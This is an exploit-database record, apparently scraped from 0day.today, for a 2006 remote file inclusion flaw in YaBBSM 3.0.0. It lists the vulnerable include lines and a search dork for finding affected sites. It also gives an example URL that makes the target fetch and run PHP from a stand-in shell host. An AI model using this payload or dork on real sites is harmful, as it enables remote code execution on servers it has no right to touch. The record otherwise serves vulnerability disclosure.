Description
Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-990", "type": "zdt", "bulletinFamily": "exploit", "title": "YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2006-10-13T00:00:00", "modified": "2006-10-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/990", "reporter": "SilenZ", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T03:01:56", "viewCount": 10, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/990", "sourceData": "============================================================\r\nYaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability\r\n============================================================\r\n\r\n\r\n\r\n[DESCRIPTION] Remote file include vuln found by sZ [oct 09, 2006]\r\n[SOFTWARE] Supermod 3.0 for yabb\r\n[VENDOR URL] http://www.supermod.org\r\n[DORK] YaBBSM V2.5.0 // Powered by YaBBSM V2.5.0 Based on YABB SE\r\n[NOTES] greetz to: neo-vortex, icez, Solano College CIS students.\r\n \r\n\r\nVULN:\r\nOffline.php\r\ninclude(\"$sourcedir/pclzip.lib.php\");\r\nThey forgot to include settings.php, this file seems to not exist sometimes.\r\n \r\nVULN:\r\nSources/Admin.php\r\ninclude_once(\"$sourcedir/Recent.php\");\r\n \r\nVULN:\r\nSources/Offline.php\r\ninclude_once(\"$sourcedir/Recent.php\");\r\n \r\nVULN:\r\ncontent/portalshow.php\r\ninclude_once \"$sourcedir/Calendar.php\";\r\n \r\n[EXAMPLE] http://site.com/community/Offline.php?sourcedir=http://shellurl.com/phpcommands.txt?\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1645257119, "score": 1659766679, "epss": 1678812679}}
{}
YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability